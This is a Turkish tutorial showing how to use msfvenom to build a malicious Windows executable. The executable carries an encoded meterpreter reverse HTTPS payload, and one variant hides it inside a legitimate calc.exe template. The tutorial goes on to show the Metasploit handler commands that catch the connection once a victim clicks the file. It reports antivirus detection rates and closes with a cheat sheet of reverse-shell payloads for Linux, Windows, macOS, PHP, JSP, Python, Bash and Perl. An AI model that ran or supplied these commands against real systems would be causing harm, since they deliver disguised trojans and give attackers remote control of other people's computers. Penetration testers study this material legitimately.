Msfvenom; MsfPayload ve MsfEncode modüllerinin birleşimidir. Günümüzde bu modüller için destek kaldırılmış olup, bu modüller yerine Msfvenom kullanılması tavsiye edilmektedir. Msfvenom ile ilgili ayrıntılı bilgi için “-h” seçeneği kullanılabilir.
msfvenom -h
Msfvenom ile zararlı bir exe oluşturulması için örnek bir komut aşağıdaki gibidir:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.130 LPORT=443 -e x86/shikata_ga_nai -f exe -i 5 -b ‘x00’ > /root/Desktop/ZararliUygulama.exe
Not: Örnek bir kullanım da aşağıdaki gibidir:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.130 LPORT=443 -a x86 –platform windows -f raw -e x86/countdown -i 5 | msfvenom -a x86 –platform windows -e x86/shikata_ga_nai -i 5 -b ‘x00’ -f exe -x yasalUygulama_calc.exe -o /root/Desktop/ZararliUygulama.exe
Yukarıdaki komut kullanılarak Payload olarak “windows/meterpreter/reverse_https“, Encoder olarak da “x86/shikata_ga_nai ” kullanılmıştır. Encoder ve Payload kavramları hakkında ek bilgi için bakınız.
Kali makinenin /root/Desktop dizininde oluşan uygulama dosyası (ZararliUygulama.exe) istemci bir bilgisayara gönderilir. Bu uygulama tıklandığında bağlantı elde edilmesi için “exploit/multi/handler” modülü kullanılır:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST 192.168.0.130
msf exploit(handler) > set LPORT 443
msf exploit(handler) > show options
Exploit işlemi başlatılır ve exe uygulamasının tıklanması için beklenilir.
exploit -j
Zararlı uygulama tıklandığı durumda Payload çalışır ve bağlantı kurulur.
sessions -l
sessions -i 1
getuid
Hazırlanan zararlı uygulamanın, günümüzde bir çok antivirüs tarafından yakalandığı görülmektedir. Virüs.mu tarafından gerçekleştirilen tarama sonucunda 20 antivirüsten 16 tanesi tarafından yakalandığı görülmektedir:
Bunun yanında VirusTotal tarafından gerçekleştirilen tarama sonucunda 55 antivirüsten 38 tanesi tarafından yakalandığı görülmektedir.
Msfvenom ile en çok kullanılan payload’lar ve formatları aşağıdaki gibi listelenebilir.
- Linux Payload (-p): linux/x86/meterpreter/reverse_tcp
Linux Format (-f): elf - Windows Payload (-p): windows/meterpreter/reverse_tcp
Windows Format (-f): exe - MAC Payload (-p): osx/x86/shell_reverse_tcp
MAC Format (-f): macho - PHP Payload (-p): php/meterpreter_reverse_tcp
PHP Format (-f): php - ASP Payload (-p): windows/meterpreter/reverse_tcp
ASP Format (-f): asp - JSP Payload (-p): java/jsp_shell_reverse_tcp
JSP Format (-f): raw - WAR Payload (-p): java/jsp_shell_reverse_tcp
WAR Format (-f): war - Python Payload (-p): cmd/unix/reverse_python
Python Format (-f): raw - Bash Payload (-p): cmd/unix/reverse_bash
Bash Format (-f): raw - Perl Payload (-p): cmd/unix/reverse_perl
Perl Format (-f): raw
Kaynaklar:
http:// [Zararli URL Kategorisinde] security-geek. [Zararli URL Kategorisinde] in/2016/09/07/msfvenom-cheat-sheet/
http://www.kursatoguzhanakinci.com/2015/07/msfvenom-kullanm-detayl.html
https://netsec.ws/?p=331